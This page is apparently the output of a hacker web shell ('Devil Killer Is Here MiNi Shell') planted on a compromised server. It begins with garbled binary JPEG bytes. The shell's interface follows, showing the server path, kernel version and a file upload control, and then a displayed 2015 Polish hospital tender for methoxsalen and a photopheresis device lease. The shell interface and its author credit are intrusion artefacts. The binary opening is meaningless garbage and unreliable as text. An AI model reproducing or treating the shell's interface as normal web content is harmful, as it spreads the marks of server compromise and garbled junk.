JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150914/239126-N-2015.html

<p class="kh_header"><b>Wrocław: Dostawa produktu farmaceutycznego
methoxsalen, wyrobu medycznego wraz z dzierżawą urządzenia do procesu fototerapii pozaustrojowej w
systemie off-line.</b><br>
<b>Numer ogłoszenia: 239126 - 2015; data zamieszczenia: 14.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny Nr 1 , ul. M. Skłodowskiej-Curie 58, 50-369 Wrocław, woj. dolnośląskie, tel. 071 7842030, faks 071 3270911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spsk1.w.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktu farmaceutycznego
methoxsalen, wyrobu medycznego wraz z dzierżawą urządzenia do procesu fototerapii pozaustrojowej w
systemie off-line..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa produktu farmaceutycznego
methoxsalen, wyrobu medycznego wraz z dzierżawą urządzenia do procesu fototerapii pozaustrojowej w systemie off-line.
Szczegółowy opis przedmiotu zamówienia stanowi formularz cenowy
wraz z wykazem parametrów technicznych. Wartość zamówienia nie przekracza kwoty określonej w
przepisach wydanych na podstawie art. 11 ust. 8 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień
publicznych ( tj. Dz. U. z 2013 r. poz. 907 z późn. zm. )..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą oświadczenie, o spełnianiu
tego warunku. Posiadają koncesję lub zezwolenia na podjęcie działalności gospodarczej w
zakresie objętym zamówieniem Sposób dokonywania oceny spełnienia warunku oparty będzie
na zasadzie: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą oświadczenie, o spełnianiu
tego warunku. Sposób dokonywania oceny spełnienia warunku oparty będzie na zasadzie:
spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą oświadczenie, o spełnianiu
tego warunku. Sposób dokonywania oceny spełnienia warunku oparty będzie na zasadzie:
spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą oświadczenie, o spełnianiu
tego warunku. Sposób dokonywania oceny spełnienia warunku oparty będzie na zasadzie:
spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą oświadczenie, o spełnianiu
tego warunku. Sposób dokonywania oceny spełnienia warunku oparty będzie na zasadzie:
spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)W celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1
Ustawy Prawo zamówień publicznych (tj. Dz. U. z 2013 r. poz. 907 z późn. zm.) Wykonawca zobowiązany
jest do złożenia następujących dokumentów i oświadczeń: 1)1. Oświadczenie o spełnieniu warunków
udziału w postępowaniu określonego przepisem art. 22 ust. 1 cyt. Ustawy pzp, stanowiące Rozdział IV
SIWZ - należy przedstawić w formie oryginału wg załączonego druku 1)2.PISEMNE ZOBOWIĄZANIE
innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z
nich przy wykonywaniu zamówienia (o ile dotyczy) - należy przedstawić w formie oryginału lub kserokopii
poświadczonej za zgodność z oryginałem przez notariusza. 1)3.Koncesje lub zezwolenie na podjęcie
działalności gospodarczej w zakresie objętym zamówieniem 1)4.Jeżeli Wykonawca, wykazując spełnianie
warunków, o których mowa w art. 22 ust. 1 ustawy pzp, polega na zasobach innych podmiotów na
zasadach określonych w art. 26 ust. 2b ustawy pzp, Zamawiający, w celu oceny, czy Wykonawca będzie
dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia
oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich
zasobów, może żądać: 1)3.1 w przypadku warunków, o których mowa w art. 22 ust. 1 pkt 4 cyt. ustawy pzp
- dokumentów, dotyczących sytuacji ekonomicznej i finansowej, określonych w ogłoszeniu o zamówieniu
lub w specyfikacji istotnych warunków zamówienia; 1)3.2 a także innych dokumentów dotyczących w
szczególności: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania
zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki
będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy
wykonywaniu zamówienia. 2)W CELU POTWIERDZENIA BRAKU PODSTAW DO WYKLUCZENIA z
postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 cyt.
Ustawy pzp, w złożonych ofertach Wykonawcy złożą następujące dokumenty i oświadczenia: 2)1.
Oświadczenie Wykonawcy przewidziane w art. 24 ust. 1 cyt. Ustawy pzp, stanowiące Rozdział V SIWZ -
należy przedstawić w formie oryginału wg załączonego druku 2)1.1. Oświadczenie Wykonawcy o
przynależności do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i
konsumentów ( Dz. U. z 2007 r. Nr 50 poz. 331 z poźn. zm.) wraz z listą podmiotów należących do tej
samej grupy kapitałowej lub oświadczenie, że Wykonawca nie należy do grupy kapitałowej stanowiące
Rozdział VI SIWZ - należy przedstawić w formie oryginału wg załączonego druku 2)2. Aktualny odpis z
właściwego rejestru, lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w
oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert należy przedstawić w formie oryginału lub kserokopii poświadczonej za zgodność z
oryginałem przez Wykonawcę. 2)3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza
terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2.)2. składa dokument
lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości - należy przedstawić w formie oryginału lub
kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę; 2)4.Dokumenty, o których mowa w
pkt. 2.)3. powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 2)
5.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2)3., zastępuje się je dokumentem
zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym
albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub
kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Wymóg określony w pkt. 2)4 stosuje się
odpowiednio - należy przedstawić w formie oryginału lub kserokopii poświadczonej za zgodność z
oryginałem przez Wykonawcę, 2)6.Wykonawca powołując się przy wykazywaniu spełniania warunków
udziału w postępowaniu, o którym mowa w art. 24 ust. 1 ustawy pzp, na zasoby innych podmiotów, które
będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w
zakresie wymaganym dla wykonawcy wymienionym w pkt. 2)1., 2)2 oraz o ile dotyczy w pkt. 2)3 - 2)5. 3)
Pozostałe oświadczenia i dokumenty, jakie wykonawcy muszą dostarczyć w złożonych ofertach: 3)1.
Wypełniony formularz oferty (należy przedstawić w formie oryginału wg załączonego druku stanowiącego
Rozdział II SIWZ) 3)2. Wypełniony formularz cenowy wraz z wykazem parametrów technicznych (należy
przedstawić w formie oryginału wg załączonego druku stanowiące Rozdział VIII SIWZ) 3)3.
PEŁNOMOCNICTWO pisemne, do podpisania oferty, oświadczeń i dokumentów składających się na
ofertę, o ile to pełnomocnictwo nie wynika z innych dokumentów dołączonych do oferty, w swojej treści
musi spełniać wymogi formalno - prawne określone w Kodeksie Cywilnym zawierające zapis, że osoba
upełnomocniona ( pełnomocnik ) może występować w imieniu firmy, którą reprezentuje w postępowaniu o
udzielenie zamówienia publicznego, z podaniem jej danych tj.: imienia i nazwiska, o ile pełnomocnictwo to
nie wynika z innych dokumentów dołączonych do oferty, należy przedstawić w formie oryginału lub
poświadczonej przez notariusza zgodności kopii/odpisu z dokumentem. 3)3.1.W przypadku oferty
składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka
cywilna), do oferty powinno zostać załączone PEŁNOMOCNICTWO dla osoby uprawnionej do ich
reprezentowania w postępowaniu o udzielenia zamówienia publicznego albo do ich reprezentowania w
postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy, z podaniem jej danych tj.: imienia i
nazwiska- należy przedstawić w formie oryginału lub poświadczonej przez notariusza zgodności
kopii/odpisu z dokumentem. 3)3.2.Wypis/ odpis pełnomocnictwa udzielonego w formie aktu notarialnego winien być w oryginale. 3)4.Wykaz części zamówienia, której wykonanie Wykonawca powierza
podwykonawcom - Wykonawca dołącza w formie oryginału wg załączonego druku stanowiącego Rozdział
VII SIWZ) 4.4)Wszystkie dokumenty będą przedstawione w formie oryginału lub kserokopii
poświadczonych na każdej stronie za zgodność z oryginałem przez Wykonawcę. Zamawiający może żądać
przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów, jeśli np. przedstawione
kserokopie będą nieczytelne lub będą wzbudzać uzasadnione wątpliwości co do ich prawdziwości, a
Zamawiający nie będzie mógł sprawdzić ich prawdziwość w inny sposób. 4.4)1. W przypadku wykonawców
wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów na zasobach
których wykonawca polega na zasadach określonych art. 26 ust 2b ustawy, kopie dokumentów
dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem
odpowiednio przez wykonawcę lub te podmioty. 4.4)2. Zamawiający może żądać przedstawienia oryginału
lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest
nieczytelna lub budzi wątpliwości co do jej prawdziwości. 5)Dokumenty sporządzone w języku obcym będą
składane wraz z tłumaczeniem na język polski, poświadczone przez Wykonawcę. 6)Dokumenty zostaną
wypełnione przez Wykonawcę według wzorów zawartych w specyfikacji istotnych warunków zamówienia
bez dokonywania w nich zmian przez Wykonawcę. W przypadku, gdy jakakolwiek część powyższych
dokumentów nie dotyczy Wykonawcy, wpisuje on nie dotyczy. 7)Dokumenty nie wymagane przez
Zamawiającego a załączone do oferty nie będą podlegały ocenie. 8)Postępowanie o udzielenie
zamówienia jest jawne. Wykonawca, na podstawie art. 8 ust 3 ustawy pzp, może zastrzec informacje
stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.
Zastrzeżenie powyższe należy złożyć nie później niż w terminie składania ofert a Wykonawca winien
wskazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec
informacji, o których mowa w art. 86 ust 4 cyt. ustawy pzp. Stosowne zastrzeżenie Wykonawca winien
złożyć w formularzu oferty i odpowiednio oznaczyć strony oferty napisem, np. Tajemnica przedsiębiorstwa
nie udostępniać. W przeciwnym razie cała oferta zostanie ujawniona zainteresowanym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszcza się zmianę umowy w zakresie stawki VAT, jeżeli w czasie obowiązywania umowy zmienione
zostaną przepisy prawa określającego wysokość stawki podatku od towaru i usług (VAT), zmiana taka
wymaga zachowania formy aneksu. 2. W przypadku nie zrealizowania zamówienia w okresie 12 miesięcy
Zamawiający może przedłużyć okres realizacji umowy do czasu wyczerpania zamawianego asortymentu
określonego w formularzu cenowym i Wykonawca zobowiązuje się do zawarcia stosowanego aneksu na
żądanie Zamawiającego jednak nie dłużej niż o kolejne 4 miesiące. 3. Cena jednostkowa netto
asortymentu objętego niniejszą umową może ulec zmianie w następujących przypadkach i na
następujących zasadach: 3.1 w przypadku obniżenia maksymalnej ceny zakupu produktów leczniczych dla
Świadczeniodawcy w rozumieniu art. 9 ust. 1 ustawy z dnia 12 maja 2011r. o refundacji leków, środków
spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych (zwanej dalej ustawą
refundacyjną) poniżej ceny zawartej w umowie (zwanej dalej ceną umowną), cena umowna ulega
obniżeniu do wysokości wynikającej z wprowadzonej urzędowo zmiany - powyższa zmiana nie wymaga
zachowania formy aneksu i obowiązuje od chwili wejścia w życie obniżonej maksymalnej ceny zakupu. 4.
Cena leku nie może być wyższa od wysokości limitu finansowania określonego dla tego leku w aktualnie
obowiązującym Obwieszczeniu Ministra Zdrowia w sprawie wykazu leków, środków spożywczych
specjalnego przeznaczenia żywieniowego, dla których ustalono urzędową cenę zbytu w części B i/lub C
załącznika. W przypadku, gdy kolejnym Obwieszczeniem Ministra Zdrowia wysokość limitu finansowania
danego produktu leczniczego ulega obniżeniu poniżej ceny umownej, cena musi zostać zmniejszona do
wysokości limitu finansowania a zmiana taka nie wymaga zachowania formy aneksu. 5. W przypadku
wzrostu ceny urzędowej produktów leczniczych (art.9 ust.1 ustawy refundacyjnej) cena umowna może ulec
zmianie o wskaźnik wzrostu, jednakże do wysokości nie wyższej niż wynikająca z zastosowania art.9 ust. 1
ustawy refundacyjnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spsk1.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny
Szpital Kliniczny Nr 1 we Wrocławiu; 50-369 Wrocław, ul. Marii Curie-Skłodowskiej nr 58, Dział Zamówień
Publicznych, pokój nr 19. Cena 19,44 zł + koszty przesyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2015 godzina 12:00, miejsce: Samodzielny Publiczny Szpital Kliniczny Nr 1 we Wrocławiu; 50-369 Wrocław,
ul.M. Curie-Skłodowskiej nr 58, Dział Zamówień Publicznych, pokój nr 19. Otwarcie ofert 28.09.2015 r,godz.12:30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com